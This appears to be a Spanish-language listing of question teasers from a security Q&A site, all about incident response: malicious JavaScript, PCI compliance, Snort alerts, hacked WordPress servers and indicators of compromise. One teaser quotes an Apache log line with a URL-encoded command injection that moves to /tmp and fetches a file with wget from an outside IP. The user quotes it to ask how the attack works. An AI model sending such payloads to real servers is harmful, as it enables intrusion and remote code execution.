Preguntas con etiqueta 'incident-response'

2
respuestas

Encontré un Javascript malicioso, ¿cómo llegó allí?

Encontré algunos javascript maliciosos en un sitio de Joomla que notamos que ha regresado después de ser eliminado hace una semana. También notó que www.cssstickyfooter.com está infectado por el mismo código. Si tienes curiosidad, aquí está todo...
hecha 03.06.2011 - 05:29
2
respuestas

¿Cómo satisfacer el requisito 10.6 de PCI DSS?

La empresa para la que trabajo está solicitando el cumplimiento de PCI y estoy a cargo de escribir la mayoría de los procedimientos y políticas requeridos. El problema es que no tengo ninguna experiencia con la seguridad de TI, por lo que la may...
hecha 29.01.2013 - 14:29
1
respuesta

Solicitud de salida TFTP al 255.255.255.255

Recientemente, Snort me notificó que tengo una computadora de usuario en mi red que está iniciando una solicitud TFTP saliente. Lo extraño es que el destino es 255.255.255.255 ¿Alguien tiene una idea de lo que puede ser? Cargas útiles recu...
hecha 03.07.2012 - 17:15
1
respuesta

¿Cómo podría funcionar este ataque?

Estaba explorando mis registros de apache y encontré la siguiente solicitud (que resultó en un 404): 106.75.130.216 - - [DD/MMM/YYYY:hh:mm:ss] "GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%36%31%2E%31%36%30%2E%32...
hecha 26.03.2017 - 20:29
3
respuestas

¿Cuáles son los riesgos de publicar mi dirección de correo electrónico en pwnedlist.com?

pwnedlist.com afirma tener detalles de más de 23 millones de cuentas que han sido hackeadas, y si envía su dirección de correo electrónico, aparentemente le dirán Tú si estás en la base de datos. ¿Las personas que ejecutan el sitio tienen b...
hecha 27.07.2012 - 06:40
3
respuestas

Necesita algunas recomendaciones sobre una buena capacitación práctica de IR [cerrado]

¿Alguien sabe si hay una buena capacitación práctica sobre respuesta a incidentes y análisis forense digital, o la certificación que debo tomar para obtener más experiencia práctica? Gracias y cualquier información útil es apreciada.     
hecha 20.02.2016 - 01:51
2
respuestas

¿Dominio de la Política de notificación o notificación de incidentes?

Estoy escribiendo una política de la compañía sobre cómo los empleados deben manejar los informes de eventos relacionados con la seguridad de la información y las notificaciones que provienen de proveedores, clientes y personas de nuestra organi...
hecha 21.03.2013 - 17:19
1
respuesta

Indicadores de compromiso

Solo para comprender cómo funcionan los indicadores de compromiso. Por ejemplo, en este artículo , la herramienta SMB. Hay un hash MD5 para ello. Entonces, ¿se supone que mis firewalls o IDS pueden detectar esta cadena de hash MD5? ¿Cómo van a...
hecha 10.02.2015 - 14:13
2
respuestas

¿Cómo ejecuto una comprobación de seguridad en mi servidor de WordPress?

Tengo un servidor basado en la nube que se ejecuta con CentOS 6.0 y CSF instalado. Hoy recibí un mensaje de mi anfitrión de que una de mis instalaciones de WordPress fue pirateada y utilizada para phishing. Pero no sé cómo ha sucedido esto. N...
hecha 10.08.2012 - 12:35
1
respuesta

¿Cuál es la definición de recuperación ante desastres de "múltiples fallas"?

Hay varios criterios de cumplimiento y certificación que mencionan la recuperación de desastres "de fallos múltiples". ¿Cuál es exactamente la definición de esto? Una búsqueda en Google no me dio una respuesta clara.     
hecha 13.02.2014 - 22:04